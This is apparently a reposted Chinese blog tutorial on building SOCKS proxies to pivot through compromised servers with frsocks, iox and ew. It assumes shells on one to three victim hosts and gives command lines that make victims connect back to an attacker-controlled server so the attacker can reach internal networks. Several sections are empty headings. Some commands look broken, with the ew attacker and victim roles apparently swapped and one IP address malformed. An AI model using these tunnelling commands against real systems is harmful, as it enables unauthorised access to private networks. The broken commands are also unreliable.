栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

socks服务搭建总结

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

socks服务搭建总结

文章目录
  • 1. 涉及到的工具
  • 2. frsocks
    • 1. 一层
      • 1. 正向
      • 2. 反向
    • 2. 两层
    • 3. 不适合三层
  • 3. iox
    • 1. 一层
      • 1.1 正向
      • 1.2 反向
    • 2. 两层
    • 3. 三层
  • 4. ew
    • 1. 一层
      • 1. 正向
      • 2. 反向
    • 2. 两层
    • 3. 三层
  • 5. frp
    • 1. 一层
      • 1. 正向
      • 2. 反向
    • 2. 两层
    • 3. 三层
  • 6. neo-regorg
    • 1. 一层
      • 1. 正向
      • 2. 反向
    • 2. 两层
    • 3. 三层
  • 6. tfirewall
    • 1. 一层
      • 1. 正向
      • 2. 反向
    • 2. 两层
    • 3. 三层
  • 参考文章

1. 涉及到的工具
  • frsocks
  • iox
  • ew
  • frp
  • neo-regeorg
  • tfirewall
2. frsocks 1. 一层 1. 正向
frsocks_windows_386.exe -sockstype fsocks -listen 9999

2. 反向

让目标机器方向连接我们的服务器,通过我们的服务器上的端口来实现socks5服务:

#自己的服务器ip为1.1.1.1
frsocks_windows_386.exe -sockstype rsocks -listen 1111 -socks 1.1.1.1:2222
#受害者服务器
frsocks -sockstype rsocks -connect 1.1.1.1:1111

此时我们可以连接1.1.1.1的2222端口来使用socks5服务。

2. 两层

单个工具无法实现,需配合别的工具。

3. 不适合三层

单个工具无法实现,需配合别的工具。

3. iox 1. 一层 1.1 正向
iox64.exe proxy -l 9999

1.2 反向
#自己服务器ip 1.1.1.1
iox64.exe proxy -l 8888 -l 9999
#被攻击的服务器
iox64.exe proxy -r 1.1.1.1:8888
2. 两层


只有B能访问内网核心资源,你现在拥有A和B的shell,这时候需要一个socks5代理方便下一步工作:

在自己服务器上执行:

#8888是回连地址,9999是socks5服务的地址,我们使用9999端口来使用socks服务
iox64.exe proxy -l 8888 -l 9999

在服务器A上执行:

iox64.exe  fwd -l 3333 -r 1.1.1.1:8888

在服务器B上执行:

iox64.exe proxy -r 2.2.2.2:3333

也可以使用这三条

iox64.exe fwd -l 8888 -l 9999 

iox64.exe fwd -r 1.1.1.1:8888 -r 3.3.3.3:3333

iox64.exe proxy -l 3.3.3.3:3333
3. 三层


只有服务器C可以访问核心数据,我们拥有ABC的shell。

在自己的服务器上执行:

iox64.exe fwd -l 8888 -l 9999 

在服务器A上执行:

iox64.exe fwd -r 1.1.1.1:8888 -r 3.3.3.3:3333

在服务器B上执行:

iox64.exe fwd -l 3.3.3.3:3333 -r 4.4.4.4:4444

在服务器C上执行:

iox64.exe proxy -l 4.4.4.4:4444

也可以使用下面的方法:

在自己的服务器上执行:
iox64.exe proxy -l 8888 -l 9999 

在服务器A上执行:
iox64.exe fwd -l 2.2.2.2:4444 -r 1.1.1.1:8888

在服务器B上执行:
iox64.exe fwd -l 3.3.3.3.135:3333 -r 2.2.2.2:4444

在服务器C上执行:
iox64.exe proxy -r 3.3.3.3:3333
4. ew 1. 一层 1. 正向
ew_for_Win.exe -s ssocksd -l 9999
2. 反向
#自己服务器
ew_for_Win.exe -s rssocks -d 192.168.171.135 -e 7777
#被攻击服务器
ew_for_Win.exe -s rcsocks -l 9999 -e 7777
ew_for_Win.exe -s lcx_listen -l 9999 -e 7777
2. 两层 3. 三层 5. frp 1. 一层 1. 正向 2. 反向 2. 两层 3. 三层 6. neo-regorg 1. 一层 1. 正向 2. 反向 2. 两层 3. 三层 6. tfirewall 1. 一层 1. 正向 2. 反向 2. 两层 3. 三层 参考文章

https://shanfenglan.blog.csdn.net/article/details/122057545

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/675603.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号